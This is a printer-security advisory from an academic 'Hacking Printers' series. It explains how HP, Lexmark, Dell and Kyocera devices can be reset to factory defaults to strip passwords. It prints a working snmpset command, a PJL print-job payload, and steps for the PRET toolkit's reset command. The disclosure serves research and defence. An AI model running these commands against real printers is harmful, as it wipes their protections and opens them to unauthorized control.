TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 5 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
resetting a printer to factory defaults through ordinary print jobs,
therefore bypassing all protection mechanisms like user-set passwords.
The attack can be performed by anyone who can print, for example through
USB or network. It can even be carried out by a malicious website, using
cross-site printing techniques (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

========================[ Factory Defaults ]==========================

-------------------------[ Affected Devices ]-------------------------

This vulnerability has been verfied for the devices listed below:

- HP LaserJet 4200N (Firmware version: 20050602) a PML based attacks
- HP LaserJet 4250N (Firmware version: 20150130) a PML based attacks
- HP LaserJet P2015dn (Firmware version: 20070221) a PML based attacks
- HP LaserJet M2727nfs (Firmware version: 20140702) a PML based attacks
- HP LaserJet 3392 AiO (Firmware version: 20120925) a PML based attacks
- HP LaserJet CP1515n (Firmware version: 20120110) a PML based attacks
- Lexmark X264dn (Firmware version: NR.APS.N645) a SNMP only
- Lexmark E360dn (Firmware version: NR.APS.N645) a SNMP only
- Lexmark C736dn (Firmware version: NR.APS.N644) a SNMP only
- Dell 1720n (Firmware version: NM.NA.N099) a SNMP only
- Kyocera FS-C5200DN (Firmware version: 2011.05.16) a SNMP only

Further HP printers are likely to be affected.
Vendor informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The `Printer-MIB' (RFC3805) defines the prtGeneralReset Object (OID
1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restore factory
defaults (resetToFactoryDefaults(6)) using SNMP (port 161/udp). This is
a legitimate feature, but can also be used by an attacker to
remove/bypass protection mechanisms like user-set passwords for the
embedded web server, PJL and PostScript if the default/public SNMP
community string has not been changed:

----------------------------------------------------------------------
snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
----------------------------------------------------------------------

In many scenarios an attacker does not have the capabilities to perform
SNMP requests because of firewalls or unknown SNMP community strings. On
HP devices however, she can transform SNMP into its PML representation
and embed the request within a legitimate print job:

----------------------------------------------------------------------
@PJL DMCMD ASCIIHEX="040006020501010301040106"
----------------------------------------------------------------------

This way, anyone who can print can reset the device to factory defaults
and hereby remove any protection mechanisms.

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. The attack can be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> reset

Note that if your printer does not restart and restore factory defaults,
it may still be vulnerable to SNMP based attacks as mentioned above.

-----------------------[ Further Information ]------------------------

Information on this bug/feature of SNMP and PML can be found at:
http://hacking-printers.net/wiki/index.php/Factory_defaults
https://tools.ietf.org/html/rfc3805